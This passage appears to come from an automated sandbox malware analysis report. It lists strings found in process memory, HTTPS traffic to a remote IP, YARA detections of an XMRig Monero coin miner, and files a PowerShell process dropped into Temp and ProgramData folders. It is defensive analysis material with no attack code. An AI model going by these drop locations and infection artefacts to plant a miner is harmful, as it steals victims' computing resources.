                    Source: powershell.exe, 00000009.00000002.1946719482.0000023681C39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023681C18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023681C25000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/800
                    Source: powershell.exe, 00000009.00000002.1946719482.00000236819C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/pull/2624
                    Source: powershell.exe, 00000009.00000002.1946719482.0000023681C5B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023681C66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/pull/3024
                    Source: powershell.exe, 00000009.00000002.1946719482.0000023681BC2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023681BB4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/pull/611
                    Source: powershell.exe, 00000009.00000002.1946719482.0000023681D78000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023681D86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/raw/main/docs/_static/banner_github.svg)
                    Source: powershell.exe, 00000009.00000002.1946719482.0000023681D78000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023681D86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/workflows/CI/badge.svg
                    Source: powershell.exe, 0000000D.00000002.2400933097.0000025E81163000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                    Source: powershell.exe, 00000009.00000002.1946719482.0000023681988000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com/
                    Source: powershell.exe, 00000009.00000002.1946719482.00000236815BD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.00000236815C7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.000002368197E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023681988000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com/mail
                    Source: powershell.exe, 00000009.00000002.1946719482.0000023681CE9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com/mail/
                    Source: powershell.exe, 00000009.00000002.1946719482.0000023681557000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.000002368191B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023681925000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023681564000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/
                    Source: powershell.exe, 00000009.00000002.1946719482.0000023681988000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/
                    Source: powershell.exe, 00000009.00000002.1946719482.0000023681D78000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023681D86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://img.shields.io/badge/coverage-100%25-success
                    Source: powershell.exe, 00000009.00000002.1946719482.00000236813B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.00000236813A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://img.shields.io/badge/skeleton-2024-informational
                    Source: powershell.exe, 00000009.00000002.1946719482.00000236813B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.00000236813A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://img.shields.io/codecov/c/github/pypa/setuptools/master.svg?logo=codecov&logoColor=white
                    Source: powershell.exe, 00000009.00000002.1946719482.0000023681D78000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023681D86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://img.shields.io/discord/756342717725933608?color=%237289da&label=discord
                    Source: powershell.exe, 00000009.00000002.1946719482.00000236813B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.00000236813A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://img.shields.io/discord/803025117553754132
                    Source: powershell.exe, 00000009.00000002.1946719482.00000236813B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.00000236813A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://img.shields.io/endpoint?url=https://raw.githubusercontent.com/charliermarsh/ruff/main/assets
                    Source: powershell.exe, 00000009.00000002.1946719482.00000236813B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.00000236813A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://img.shields.io/pypi/pyversions/setuptools.svg
                    Source: powershell.exe, 00000009.00000002.1946719482.0000023681D78000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023681D86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://img.shields.io/pypi/pyversions/urllib3.svg?maxAge=86400
                    Source: powershell.exe, 00000009.00000002.1946719482.00000236813B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.00000236813A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://img.shields.io/pypi/v/setuptools.svg
                    Source: powershell.exe, 00000009.00000002.1946719482.0000023681D78000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023681D86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://img.shields.io/pypi/v/urllib3.svg?maxAge=86400
                    Source: powershell.exe, 00000009.00000002.1946719482.00000236813B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.00000236813A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://img.shields.io/readthedocs/setuptools/latest.svg
                    Source: powershell.exe, 00000004.00000002.1327060198.000001DCE3BB0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1301594968.000001DCD53CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1327060198.000001DCE3A7A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2030791717.00000236901B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2030791717.0000023690070000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1423292874.00000263443E3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1360597660.0000026335B06000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1423292874.00000263442AC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2400933097.0000025E819FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2592051177.0000025E90071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2592051177.0000025E901B3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2351984899.000001B647AFC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2351984899.000001B647C33000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                    Source: KDF.py.9.drString found in binary or memory: https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-108r1.pdf
                    Source: powershell.exe, 00000004.00000002.1301594968.000001DCD4E84000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1360597660.00000263356B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
                    Source: powershell.exe, 00000004.00000002.1301594968.000001DCD4E84000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1360597660.00000263356B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
                    Source: powershell.exe, 00000009.00000002.1946719482.00000236809FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://opensource.org
                    Source: egg_info.cpython-312.pyc.9.drString found in binary or memory: https://peps.python.org/pep-0632/)
                    Source: powershell.exe, 00000009.00000002.1946719482.00000236805E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.00000236805F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://peps.python.org/pep-0685/
                    Source: powershell.exe, 00000009.00000002.1946719482.0000023681D78000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023681D86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pip.pypa.io):
                    Source: register.cpython-312.pyc.9.drString found in binary or memory: https://pypi.org/p/twine)z
                    Source: powershell.exe, 00000009.00000002.1946719482.00000236813B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.00000236813A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pypi.org/project/setuptools
                    Source: powershell.exe, 00000009.00000002.1946719482.000002368075D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023680749000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.000002368073B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pypi.org/project/setuptools/
                    Source: powershell.exe, 00000009.00000002.1946719482.0000023681D86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pypi.org/project/urllib3
                    Source: powershell.exe, 00000009.00000002.1946719482.00000236803F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023681003000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.00000236803D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://quickchart.io
                    Source: powershell.exe, 00000009.00000002.1946719482.0000023681D78000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023681D86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://readthedocs.org/projects/urllib3/badge/?version=latest
                    Source: powershell.exe, 00000009.00000002.1946719482.0000023682184000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023682337000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023682321000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023682314000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.000002368218D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://refspecs.linuxfoundation.org/elf/gabi4
                    Source: powershell.exe, 00000009.00000002.1946719482.00000236813B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.00000236813A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://setuptools.pypa.io
                    Source: powershell.exe, 00000009.00000002.1946719482.00000236813B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.00000236813A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://setuptools.pypa.io/
                    Source: __init__.cpython-312.pyc36.9.drString found in binary or memory: https://setuptools.pypa.io/en/latest/pkg_resources.html
                    Source: __init__.cpython-312.pyc36.9.drString found in binary or memory: https://setuptools.pypa.io/en/latest/pkg_resources.html#basic-resource-access
                    Source: __init__.cpython-312.pyc36.9.drString found in binary or memory: https://setuptools.pypa.io/en/latest/references/keywords.html#keyword-namespace-packagesr
                    Source: powershell.exe, 00000009.00000002.1946719482.00000236813B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.00000236813A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://setuptools.pypa.io/en/latest/userguide/
                    Source: powershell.exe, 00000009.00000002.1946719482.00000236813B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.00000236813A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://setuptools.pypa.io/en/latest/userguide/quickstart.html
                    Source: powershell.exe, 00000009.00000002.1946719482.00000236813B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.00000236813A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://setuptools.pypa.io/en/stable/history.html
                    Source: powershell.exe, 00000009.00000002.1946719482.0000023681D78000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023681D86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://slsa.dev
                    Source: powershell.exe, 00000009.00000002.1946719482.0000023681D78000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023681D86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://slsa.dev/images/gh-badge-level3.svg
                    Source: powershell.exe, 00000009.00000002.1946719482.0000023682337000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023682343000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sourceware.org/bugzilla/show_bug.cgi?id=24636
                    Source: powershell.exe, 00000009.00000002.1946719482.0000023682337000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023682343000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://static.docs.arm.com/ihi0044/g/aaelf32.pdf
                    Source: svchost.exe, 00000000.00000003.1369711360.000002728C241000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
                    Source: svchost.exe, 00000000.00000003.1369669526.000002728C24A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1371951064.000002728C238000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1371978908.000002728C242000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
                    Source: svchost.exe, 00000000.00000002.1371951064.000002728C238000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1372029797.000002728C258000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1371978908.000002728C242000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
                    Source: svchost.exe, 00000000.00000002.1371933085.000002728C22B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
                    Source: svchost.exe, 00000000.00000003.1369733131.000002728C257000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1372029797.000002728C258000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
                    Source: powershell.exe, 00000009.00000002.1946719482.00000236813B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.00000236813A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tidelift.com/badges/github/pypa/setuptools?style=flat
                    Source: powershell.exe, 00000009.00000002.1946719482.0000023681D78000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023681D86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tidelift.com/security).
                    Source: powershell.exe, 00000009.00000002.1946719482.00000236813B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.00000236813A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tidelift.com/subscription/pkg/pypi-setuptools?utm_source=pypi-setuptools&utm_medium=readme
                    Source: powershell.exe, 00000009.00000002.1946719482.00000236813B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.00000236813A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tidelift.com/subscription/pkg/pypi-setuptools?utm_source=pypi-setuptools&utm_medium=referral
                    Source: powershell.exe, 00000009.00000002.1946719482.0000023681D78000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023681D86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tidelift.com/subscription/pkg/pypi-urllib3?utm_source=pypi-urllib3&utm_medium=referral&utm_c
                    Source: svchost.exe, 00000000.00000003.1369733131.000002728C257000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1372029797.000002728C258000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiles.virtualearth.net/tiles/cmd/StreetSideBubbleMetaData?north=
                    Source: powershell.exe, 00000009.00000002.1946719482.0000023681557000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.000002368191B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023681925000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023681564000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc2388#section-4.4
                    Source: powershell.exe, 00000009.00000002.1946719482.0000023681C39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023681C45000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc7230#section-3.2.4
                    Source: powershell.exe, 00000009.00000002.1946719482.00000236815BD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.00000236815C7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.000002368197E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023681988000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/
                    Source: powershell.exe, 00000009.00000002.1946719482.0000023681D86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io
                    Source: powershell.exe, 00000009.00000002.1946719482.0000023681D78000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023681D86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io).
                    Source: powershell.exe, 00000009.00000002.1946719482.0000023680590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/1.26.x/advanced-usage.html#ssl-warnings
                    Source: powershell.exe, 00000009.00000002.1946719482.0000023680590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/1.26.x/advanced-usage.html#ssl-warnings)
                    Source: powershell.exe, 00000009.00000002.1946719482.00000236816AA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023681688000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html
                    Source: powershell.exe, 00000009.00000002.1946719482.00000236814F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxyz
                    Source: powershell.exe, 00000009.00000002.1946719482.00000236818E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.00000236818D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#socks-proxies
                    Source: powershell.exe, 00000009.00000002.1946719482.0000023681722000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023681731000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#socks-proxies)
                    Source: powershell.exe, 00000009.00000002.1946719482.0000023681513000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warningsN)
                    Source: powershell.exe, 00000009.00000002.1946719482.0000023681D78000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023681D86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/contributing.html)
                    Source: powershell.exe, 00000009.00000002.1946719482.0000023681D78000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023681D86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/sponsors.html).
                    Source: powershell.exe, 00000009.00000002.1946719482.000002368073B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://wheel.readthedocs.io/
                    Source: powershell.exe, 00000009.00000002.1946719482.000002368075D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023680749000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.000002368073B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://wheel.readthedocs.io/en/stable/news.html
                    Source: powershell.exe, 00000009.00000002.1946719482.00000236809FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.apache.org/licenses/
                    Source: powershell.exe, 00000009.00000002.1946719482.00000236809FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.cnri.reston.va.us)
                    Source: powershell.exe, 00000009.00000002.1946719482.00000236809FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.cwi.nl)
                    Source: powershell.exe, 00000009.00000002.1946719482.00000236803F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023681003000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.00000236803D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                    Source: powershell.exe, 00000009.00000002.1946719482.00000236803F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023681003000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.00000236803D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com;
                    Source: powershell.exe, 00000009.00000002.1946719482.00000236803F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023681003000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.00000236803D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
                    Source: KDF.py.9.drString found in binary or memory: https://www.ietf.org/rfc/rfc2898.txt
                    Source: powershell.exe, 00000009.00000002.1946719482.00000236807BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.00000236809FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.openssl.org/H
                    Source: powershell.exe, 00000009.00000002.1946719482.0000023681703000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.00000236818B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.000002368170C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.00000236818C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.pyopenssl.org
                    Source: powershell.exe, 00000009.00000002.1946719482.000002368075D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023680749000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.000002368073B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/dev/peps/pep-0427/
                    Source: powershell.exe, 00000009.00000002.1946719482.00000236809FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/psf/)
                    Source: xmrig.exe, 00000019.00000000.2141051116.00007FF6564DB000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://xmrig.com/benchmark/%s
                    Source: xmrig.exe, 00000019.00000000.2141051116.00007FF6564DB000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://xmrig.com/docs/algorithms
                    Source: xmrig.exe, 00000019.00000000.2141051116.00007FF6564DB000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://xmrig.com/wizard
                    Source: xmrig.exe, 00000019.00000000.2141051116.00007FF6564DB000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://xmrig.com/wizard%s
                    Source: powershell.exe, 00000009.00000002.1946719482.00000236815BD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.00000236815C7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.000002368197E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023681988000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://yahoo.com/
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                    Source: unknownHTTPS traffic detected: 108.181.20.35:443 -> 192.168.2.7:49699 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 108.181.20.35:443 -> 192.168.2.7:49701 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 108.181.20.35:443 -> 192.168.2.7:49712 version: TLS 1.2

                    System Summary

                    barindex
                    Source: 25.0.xmrig.exe.7ff6560c0000.0.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                    Source: 25.0.xmrig.exe.7ff6560c0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                    Source: 25.0.xmrig.exe.7ff6560c0000.0.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
                    Source: 00000019.00000000.2141051116.00007FF6564DB000.00000002.00000001.01000000.00000009.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                    Source: Process Memory Space: xmrig.exe PID: 2724, type: MEMORYSTRMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                    Source: C:\Users\user\AppData\Local\Temp\xmrig.exe, type: DROPPEDMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                    Source: C:\Users\user\AppData\Local\Temp\xmrig.exe, type: DROPPEDMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                    Source: C:\Users\user\AppData\Local\Temp\xmrig.exe, type: DROPPEDMatched rule: Detects coinmining malware Author: ditekSHen
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\pyops\_wmi.pydJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\pyops\_ctypes.pydJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\pyops\_multiprocessing.pydJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\pyops\Scripts\pip.exeJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\pyops\_overlapped.pydJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\Crypto\Hash\_SHA384.pydJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\pip\_vendor\distlib\t64-arm.exeJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\setuptools\cli-arm64.exeJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\pyops\_socket.pydJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\pyops\vcruntime140_1.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\.logstxt\nvrtc-builtins64_124.dll (copy)Jump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\pip\_vendor\distlib\t32.exeJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\pyops\_ssl.pydJump to dropped file
